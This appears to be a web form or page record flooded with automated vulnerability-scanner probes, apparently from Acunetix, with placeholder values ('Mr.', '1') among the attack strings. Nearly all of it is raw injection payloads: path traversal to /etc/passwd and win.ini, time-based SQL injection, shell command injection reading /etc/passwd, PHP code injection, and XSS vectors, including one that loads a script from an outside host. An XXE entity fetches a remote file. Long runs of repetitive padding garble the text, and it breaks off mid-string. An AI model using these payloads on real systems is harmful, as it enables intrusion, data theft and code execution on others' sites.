/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

Mr.

file:///etc/passwd

Mr.

/\../\../\../\../\../\../\../etc/passwd

Mr.

WEB-INF/web.xml

Mr.

WEB-INF\web.xml

Mr.

../../../../../../../../../../windows/win.ini

Mr.

../../../../../../../../../../boot.ini

Mr.

../../../../../../../../../../windows/win.ini.jpg

Mr.

windowswin.ini

Mr.

................windowswin.ini

Mr.

..\..\..\..\..\..\..\..\windows\win.ini

Mr.

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

Mr.

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

Mr.

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

Mr.

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

Mr.

WEB-INF/web.xml

Mr.

WEB-INF\web.xml

../../../../../../../../../../etc/passwd

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.

1

../../../../../../../../../../etc/passwd.

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.

1

/../..//../..//../..//../..//../..//etc/passwd.

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

/etc/passwd

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

................etc/passwd

1

invalid../../../../../../../../../../etc/passwd/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

1

file:///etc/passwd

1

/\../\../\../\../\../\../\../etc/passwd

1

WEB-INF/web.xml

1

WEB-INF\web.xml

1

../../../../../../../../../../windows/win.ini

1

../../../../../../../../../../boot.ini

1

../../../../../../../../../../windows/win.ini.

1

windowswin.ini

1

................windowswin.ini

1

..\..\..\..\..\..\..\..\windows\win.ini

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.

1

WEB-INF/web.xml

1

WEB-INF\web.xml

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

SomeCustomInjectedHeader:injected_by_wvs

Mr.

SomeCustomInjectedHeader:injected_by_wvs

Mr.

SomeCustomInjectedHeader:injected_by_wvs

SomeCustomInjectedHeader:injected_by_wvs

1

SomeCustomInjectedHeader:injected_by_wvs

1

SomeCustomInjectedHeader:injected_by_wvs

1

Mr.

1

Mr.

1

Mr.

1

Mr.

response.write(9457011*9009175)

Mr.

'+response.write(9457011*9009175)+'

Mr.

"+response.write(9457011*9009175)+"

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

${99865+99964}

${100278+100386}

1

response.write(9030949*9996391)

1

'+response.write(9030949*9996391)+'

1

"+response.write(9030949*9996391)+"

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

Mr.

'"()

Mr.

)

1

Mr.

!(()&&!|*|*|

'"()

1

Mr.

^(#$!@#$)(()))******

Mr.

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

Mr.

1some_inexistent_file_with_long_name%00.jpg

Mr.

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

Mr.

testasp.vulnweb.com

)

1

!(()&&!|*|*|

1

^(#$!@#$)(()))******

1

Mr.

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.

1

1some_inexistent_file_with_long_name%00.

1

http://testasp.vulnweb.com/t/fit.txt?%00.

1

testasp.vulnweb.com

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

http://testasp.vulnweb.com/t/xss.html?%00.jpg

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

http://testasp.vulnweb.com/t/fit.txt

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

http://testasp.vulnweb.com/t/fit.txt

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

Mr.

268435455

Mr.

h

Mr.

..

Mr.

1e309

Mr.

'"\'\");|]*{ <>''

Mr.

Mr.

1

Mr.

;print(md5(acunetix_wvs_security_test));

Mr.

';print(md5(acunetix_wvs_security_test));$a='

Mr.

";print(md5(acunetix_wvs_security_test));$a="

Mr.

${@print(md5(acunetix_wvs_security_test))}

Mr.

${@print(md5(acunetix_wvs_security_test))}\

;print(md5(acunetix_wvs_security_test));

1

';print(md5(acunetix_wvs_security_test));$a='

1

";print(md5(acunetix_wvs_security_test));$a="

1

${@print(md5(acunetix_wvs_security_test))}

1

${@print(md5(acunetix_wvs_security_test))}\

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

acunetix_wvs_invalid_filename

Mr.

frises_creer.php

Mr.

frises_creer.php

Mr.

frises_creer.php/.

Mr.

1

Mr.

1

1

268435455

1

h

1

..

1

1e309

1

'"\'\");|]*{ <>''

1

1

Mr.

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

Mr.

1

acunetix_wvs_invalid_filename

1

frises_creer.php

1

frises_creer.php

1

frises_creer.php/.

1

Mr.

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

http://www.acunetix.tst

Mr.

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE acunetix [ <!ENTITY acunetixent SYSTEM "http://testasp.vulnweb.com/t/fit.txt"> ]> <xxx>&acunetixent;</xxx>

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE acunetix [ <!ENTITY acunetixent SYSTEM "http://testasp.vulnweb.com/t/fit.txt"> ]> <xxx>&acunetixent;</xxx>

1

http://www.acunetix.tst

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1

Mr.

1 and sleep(4)

Mr.

1 or (sleep(4)+1) limit 1 --

Mr.

1' and sleep(4)='

Mr.

1' and (sleep(4)+1) limit 1 --

Mr.

1" and sleep(4)="

Mr.

1' or (sleep(4)+1) limit 1 --

Mr.

1" or (sleep(4)+1) limit 1 --

Mr.

1'=sleep(4)='

Mr.

1"=sleep(4)="

Mr.

1'+(select 1 from (select sleep(4))A)+'

Mr.

1;select pg_sleep(4); --

Mr.

1';select pg_sleep(4); --

Mr.

1; waitfor delay '0:0:4' --

Mr.

1'; waitfor delay '0:0:4' --

Mr.

1"; waitfor delay '0:0:4' --

Mr.

'"

Mr.

<!--

Mr.

1

'"

1

<!--

1

Mr.

1'"()&%<ScRiPt >prompt(941030)</ScRiPt>

Mr.

1_975400

Mr.

&cat /etc/passwd&

Mr.

'&cat /etc/passwd&'

Mr.

"&cat /etc/passwd&"

Mr.

'&cat /etc/passwd&'

Mr.

cat /etc/passwd

Mr.

`cat /etc/passwd`

Mr.

|cat /etc/passwd#

Mr.

'|'ld

Mr.

"|"ld

Mr.

"|"ld

Mr.

;cat /etc/passwd;

Mr.

';cat /etc/passwd;'

Mr.

";cat /etc/passwd;"

Mr.

||cat /etc/passwd

Mr.

&dir

Mr.

'&dir&'

Mr.

"&dir&"

Mr.

|dir

Mr.

'|dir

Mr.

"|dir

Mr.

1

Mr.

1

Mr.' and sleep(56.192)='

1

Mr.' and (sleep(56.192)+1) limit 1 --

1

Mr." and sleep(56.192)="

1

Mr.' or (sleep(56.192)+1) limit 1 --

1

Mr." or (sleep(56.192)+1) limit 1 --

1

Mr.'=sleep(56.192)='

1

Mr."=sleep(56.192)="

1

Mr.'+(select 1 from (select sleep(56.192))A)+'

1

Mr. and sleep(56.192)

1

Mr. or (sleep(56.192)+1) limit 1 --

1

Mr.';select pg_sleep(56.192); --

1

Mr.'; waitfor delay '0:0:56.192' --

1

Mr."; waitfor delay '0:0:56.192' --

1

Mr.

1

Mr.

1'"

Mr.

\

Mr.

1xa7

Mr.

@@9fnAw

Mr.

JyI=

Mr.

'"

Mr.

''""

Mr.'"()&%<ScRiPt >prompt(912111)</ScRiPt>

1

Mr._909268

1

acu6739<s1﹥s2ʺs3ʹuca6739

1

acux5755z1z2abcxuca5755

1

Mr.<ScRiPt >prompt(910463)</ScRiPt>

1

Mr.<script>prompt(937237)</script>

1

Mr.<ScRiPt >prompt(952091)</ScRiPt>

1

Mr.<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?955052></ScRiPt>

1

Mr.<ScRiPt >prompt(972045)</ScRiPt>

1

Mr.<video><source onerror="javascript:prompt(969613)">

1

Mr.<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(954887)"></g></svg>

1

Mr.<div style=width:expression(prompt(929559))>

1

Mr.<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='931265'>

1

Mr.<body onload=prompt(951678)>

1

Mr.<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(904558)>

1

Mr.<img src=xyz OnErRor=prompt(948591)>

1

Mr.<img/src=">" onerror=alert(935722)>

1

Mr.%3CScRiPt%20%3Eprompt(919428)%3C/sCripT%3E

1

<img acu onmouseover=prompt(993050) //>

1

Mr.<input autofocus onfocus=prompt(951833)>

1

<a href='http://www.acunetix.com'>website security</a>

1

[url=http://www.acunetix.com]website security[/url]

1

Mr._Txr4W <ScRiPt >prompt(953237)</ScRiPt>

1

Mr.

1

1'"

1

\

1

1xa7

1

@@sSS3m

1

JyI=

1

'"

1

''""

1

&cat /etc/passwd&

1

'&cat /etc/passwd&'

1

"&cat /etc/passwd&"

1

cat /etc/passwd

1

`cat /etc/passwd`

1

|cat /etc/passwd#

1

'|'ld

1

"|"ld

1

;cat /etc/passwd;

1

';cat /etc/passwd;'

1

";cat /etc/passwd;"

1

||cat /etc/passwd

1

&dir

1

'&dir&'

1

"&dir&"

1

|dir

1

'|dir

1

"|dir

1

Mr.

../../../../../../../../../../etc/passwd

Mr.

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

Mr.

../../../../../../../../../../etc/passwd.jpg

Mr.

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

Mr.

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

Mr.

/../..//../..//../..//../..//../..//etc/passwd.jpg

Mr.

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

Mr.

/etc/passwd

Mr.

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

Mr.

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

Mr.

................etc/passwd

Mr.

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

Mr.

file:///etc/passwd

Mr.

/\../\../\../\../\../\../\../etc/passwd

Mr.

WEB-INF/web.xml

Mr.

WEB-INF\web.xml

Mr.

../../../../../../../../../../windows/win.ini

Mr.

../../../../../../../../../../boot.ini

Mr.

../../../../../../../../../../windows/win.ini.jpg

Mr.

windowswin.ini

Mr.

................windowswin.ini

Mr.

..\..\..\..\..\..\..\..\windows\win.ini

Mr.

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

Mr.

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

Mr.

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

Mr.

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\